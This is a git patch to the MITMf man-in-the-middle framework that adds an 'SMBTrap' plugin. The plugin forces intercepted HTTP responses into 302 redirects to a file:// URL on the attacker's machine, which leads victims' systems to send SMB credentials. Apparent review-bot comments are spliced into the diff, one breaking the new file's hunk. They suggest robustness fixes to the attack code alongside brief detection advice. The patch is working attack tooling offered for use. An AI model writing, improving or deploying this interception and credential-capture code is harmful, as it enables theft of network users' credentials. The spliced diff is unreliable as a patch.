From c2354b9b6340f733012e184bbb442ede1ecb5184 Mon Sep 17 00:00:00 2001
From: byt3bl33d3r
Date: Tue, 2 Jun 2015 23:54:33 +0200
Subject: [PATCH] Merged the SMBTrap plugin to master and relative code changes
---
 README.md | 3 +++
 core/sslstrip/ServerConnection.py | 14 +++++++++++++-
 plugins/SMBTrap.py | 24 ++++++++++++++++++++++++
 plugins/plugin.py | 7 +++++++
 4 files changed, 47 insertions(+), 1 deletion(-)
 create mode 100644 plugins/SMBTrap.py
diff --git a/README.md b/README.md
index 3a43c32..c09f4b7 100644
--- a/README.md
+++ b/README.md
@@ -16,6 +16,7 @@ Contact me at:
 Available plugins
 =================
+- ```SMBtrap``` - Exploits the 'SMB Trap' vulnerability on connected clients
 - ```Screenshotter``` - Uses HTML5 Canvas to render an accurate screenshot of a clients browser
 - ```Responder``` - LLMNR, NBT-NS, WPAD and MDNS poisoner
 - ```SSLstrip+``` - Partially bypass HSTS
@@ -36,6 +37,8 @@ Available plugins
 Changelog
 =========
+- Added the ```SMBTrap``` plugin
+
 - Config file now updates on the fly!
 - ```SessionHijacker``` is replaced with ```Ferret-NG```, captures cookies and starts a proxy that will feed them to connected clients
diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py
index 74868f4..8e9525c 100644
--- a/core/sslstrip/ServerConnection.py
+++ b/core/sslstrip/ServerConnection.py
@@ -72,7 +72,12 @@ class ServerConnection(HTTPClient):
 def sendRequest(self):
 if self.command == 'GET':
 try:
- mitmf_logger.info("{} [type:{} os:{}] Sending Request: {}".format(self.client.getClientIP(), self.clientInfo[1], self.clientInfo[0], self.headers['host']))
+
+ if ('Unknown' in self.clientInfo[0]) or ('Unknown' in self.clientInfo[1]):
+ mitmf_logger.info("{} Sending Request: {}".format(self.client.getClientIP(), self.headers['host']))
+ else:
+ mitmf_logger.info("{} [type:{} os:{}] Sending Request: {}".format(self.client.getClientIP(), self.clientInfo[1], self.clientInfo[0], self.headers['host']))
+
 except Exception as e:
 mitmf_logger.debug("[ServerConnection] Unable to parse UA: {}".format(e))
 mitmf_logger.info("{} Sending Request: {}".format(self.client.getClientIP(), self.headers['host']))
@@ -120,6 +125,13 @@ class ServerConnection(HTTPClient):
 self.sendPostData()
 def handleStatus(self, version, code, message):
+
+ values = self.plugins.hook()
+
+ version = values['version']
+ code = values['code']
+ message = values['message']
+
 mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
 self.client.setResponseCode(int(code), message)
diff --git a/plugins/SMBTrap.py b/plugins/SMBTrap.py
new file mode 100644
index 0000000..aba0d5d
--- /dev/null
+++ b/plugins/SMBTrap.py
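Review bot: In `sendRequest` (core/sslstrip/ServerConnection.py) the new `if`/`else` reads `self.headers['host']` inside the `try`, so a request without a Host header raises there, is logged as "Unable to parse UA", and then the unchanged fallback in the `except` block reads `self.headers['host']` again and raises a second time. Resolving the value once before the `try`, for example `host = self.headers.get('host', '-')`, and formatting all three messages with `host` would remove both the misleading debug line and the repeated lookup; this assumes `self.headers` is a plain dict, which the hunk does not show. The Host value is client-supplied and reaches the log unescaped, so stripping CR/LF from it before logging is worth considering. `sendRequest` continues past the end of the hunk.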
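Review bot: `handleStatus` (core/sslstrip/ServerConnection.py, second hunk) now discards the upstream `version`, `code` and `message` and indexes whatever `self.plugins.hook()` returns, with no check that the result is a dict holding those keys; a hook that returns `None` or omits a key would turn every proxied response into an exception. `hook()` is called with no arguments and is defined outside this diff, so how the original status reaches the plugins cannot be confirmed from here. A guard such as `if values: version, code, message = values.get('version', version), values.get('code', code), values.get('message', message)` keeps the server's values as the fallback. A one-line comment stating that plugins may rewrite the status line at this point would also help, because the following `setResponseCode(int(code), message)` then acts on plugin-controlled data.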
@@ -0,0 +1,24 @@
+import logging
+import random
+import string
+from plugins.plugin import Plugin
+from core.utils import SystemConfig
+
+mitmf_logger = logging.getLogger("mitmf")
+
+class SMBTrap(Plugin):
+ name = "SMBTrap"
+ optname = "smbtrap"
+ desc = "Exploits the SMBTrap vulnerability on connected clients"
+ version = "1.0"
+ has_opts = False
+
+ def initialize(self, options):
+ self.ourip = SystemConfig.getIP(options.interface)
+
+ def serverResponseStatus(self, request, version, code, message):
+ return {"request": request, "version": version, "code": 302, "message": "Found"}
+
+ def serverHeaders(self, response, request):
+ mitmf_logger.info("{} [SMBTrap] Trapping request to {}".format(request.client.getClientIP(), request.headers['host']))
+ response.headers["Location"] = "file://{}/{}".format(self.ourip, ''.join(random.sample(string.ascii_uppercase + string.digits, 8)))
\ No newline at end of file
diff --git a/plugins/plugin.py b/plugins/plugin.py
index 0d5a324..053adc4 100644
--- a/plugins/plugin.py
+++ b/plugins/plugin.py
@@ -12,6 +12,7 @@ class Plugin(ConfigWatcher, object):
 optname = "generic"
 tree_info = list()
 desc = ""
+ version = "0.0"
 has_opts = False
 def initialize(self, options):
@@ -41,6 +42,12 @@ class Plugin(ConfigWatcher, object):
 '''
 pass
+ def serverResponseStatus(self, request, version, code, message):
+ '''
+ Handles server response HTTP version, code and message
+ '''
+ return {"request": request, "version": version, "code": code, "message": message}
+
 def serverResponse(self, response, request, data):
 '''
 Handles all non-image responses by default, hooks handleResponse() (See Upsidedownternet for how to get images)
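Review bot: `SMBTrap` and its methods in plugins/SMBTrap.py carry no docstrings, so the behaviour has to be pieced together from two separate hooks: `serverResponseStatus` forces every upstream status to `302 Found` regardless of the incoming `code`, and `serverHeaders` sets `Location` to a `file://` URL on `self.ourip`. A class docstring such as `"""Rewrite every proxied response into a 302 redirect to a file:// URL on this host."""` would state that in one place. The same docstring is a good spot to record the observable for anyone writing detections, an HTTP redirect whose `Location` uses the `file://` scheme, and that filtering outbound SMB at the network edge is the commonly recommended mitigation. The file also ends without a trailing newline.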
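Review bot: The docstring added to `Plugin.serverResponseStatus` in plugins/plugin.py (second hunk) does not state the return contract, although `ServerConnection.handleStatus` in this same patch indexes `version`, `code` and `message` on the hook result. I would extend it with `Return a dict with the keys request, version, code and message; overriding plugins must return all four.` It is also worth saying that the default implementation passes the values through unchanged. That `hook()` dispatches to this method is inferred from the names, since the dispatcher is not part of the diff.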